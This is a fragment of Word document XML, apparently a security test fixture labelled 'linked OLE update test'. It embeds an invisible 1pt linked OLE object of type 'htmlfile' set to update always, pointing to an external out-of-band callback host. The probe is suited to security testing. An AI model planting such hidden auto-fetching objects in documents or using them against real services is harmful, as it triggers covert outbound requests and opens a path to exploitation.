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linked OLE update test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:object w:dxaOrig="100" w:dyaOrig="100">
          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:1pt;height:1pt">
            <v:imagedata o:title=""/>
          </v:shape>
          <o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" UpdateMode="Always" r:id="rIdOle"/>
        </w:object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  <Relationship Id="rIdOle" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://ole.d9vh6w.oast.me/office-online/linked-ole" TargetMode="External"/>
</Relationships>
</file>